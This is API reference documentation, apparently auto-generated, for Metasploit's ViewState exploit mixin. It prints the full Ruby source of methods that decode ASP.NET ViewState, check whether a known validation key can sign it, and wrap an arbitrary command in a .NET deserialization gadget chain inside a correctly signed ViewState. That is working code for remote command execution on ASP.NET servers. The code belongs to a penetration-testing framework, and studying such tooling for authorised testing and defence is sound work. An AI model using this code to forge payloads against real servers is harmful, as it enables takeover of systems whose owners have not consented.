Module: Msf::Exploit::ViewState
- Defined in:
- lib/msf/core/exploit/viewstate.rb
Instance Method Summary collapse
- #can_sign_viewstate?(encoded_viewstate, extra: '', algo: 'sha1', key: '') ⇒ Boolean
- #decode_viewstate(encoded_viewstate, algo: 'sha1') ⇒ Object
- #generate_viewstate(data, extra: '', algo: 'sha1', key: '') ⇒ Object
- #generate_viewstate_hmac(data, algo: 'sha1', key: '') ⇒ Object
- #generate_viewstate_payload(cmd, extra: '', algo: 'sha1', key: '') ⇒ Object
- #initialize(info = {}) ⇒ Object
Instance Method Details
#can_sign_viewstate?(encoded_viewstate, extra: '', algo: 'sha1', key: '') ⇒ Boolean
87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 |
# File 'lib/msf/core/exploit/viewstate.rb', line 87 def can_sign_viewstate?(encoded_viewstate, extra: '', algo: 'sha1', key: '') viewstate = decode_viewstate(encoded_viewstate) unless viewstate[:data] vprint_error('Could not retrieve ViewState data') return false end unless (their_hmac = viewstate[:hmac]) vprint_error('Could not retrieve ViewState HMAC') return false end our_hmac = generate_viewstate_hmac( viewstate[:data] + extra, algo: algo, key: key ) # Do we have what it takes? our_hmac == their_hmac end |
#decode_viewstate(encoded_viewstate, algo: 'sha1') ⇒ Object
65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 |
# File 'lib/msf/core/exploit/viewstate.rb', line 65 def decode_viewstate(encoded_viewstate, algo: 'sha1') viewstate = Rex::Text.decode_base64(encoded_viewstate) unless Rex::Text.encode_base64(viewstate) == encoded_viewstate vprint_error('Could not decode ViewState') return {data: nil, hmac: nil} end hmac_len = generate_viewstate_hmac('', algo: algo).length if (data = viewstate[0...-hmac_len]).empty? vprint_error('Could not parse ViewState data') data = nil end unless (hmac = viewstate[-hmac_len..-1]) vprint_error('Could not parse ViewState HMAC') end {data: data, hmac: hmac} end |
#generate_viewstate(data, extra: '', algo: 'sha1', key: '') ⇒ Object
53 54 55 56 57 58 59 |
# File 'lib/msf/core/exploit/viewstate.rb', line 53 def generate_viewstate(data, extra: '', algo: 'sha1', key: '') # Generate ViewState HMAC from known values and validation key hmac = generate_viewstate_hmac(data + extra, algo: algo, key: key) # Append HMAC to provided data and Base64-encode the whole shebang Rex::Text.encode_base64(data + hmac) end |
#generate_viewstate_hmac(data, algo: 'sha1', key: '') ⇒ Object
61 62 63 |
# File 'lib/msf/core/exploit/viewstate.rb', line 61 def generate_viewstate_hmac(data, algo: 'sha1', key: '') OpenSSL::HMAC.digest(algo, key, data) end |
#generate_viewstate_payload(cmd, extra: '', algo: 'sha1', key: '') ⇒ Object
43 44 45 46 47 48 49 50 51 |
# File 'lib/msf/core/exploit/viewstate.rb', line 43 def generate_viewstate_payload(cmd, extra: '', algo: 'sha1', key: '') serialized_payload = Msf::Util::DotNetDeserialization.generate( cmd, gadget_chain: datastore['DotNetGadgetChain'].to_sym, formatter: :LosFormatter ) generate_viewstate(serialized_payload, extra: extra, algo: algo, key: key) end |
#initialize(info = {}) ⇒ Object
27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 |
# File 'lib/msf/core/exploit/viewstate.rb', line 27 def initialize(info = {}) super ([ OptEnum.new( 'DotNetGadgetChain', [ true, '.NET gadget chain to use in ViewState', :TextFormattingRunProperties, Msf::Util::DotNetDeserialization::GadgetChains::NAMES ] ) ]) end |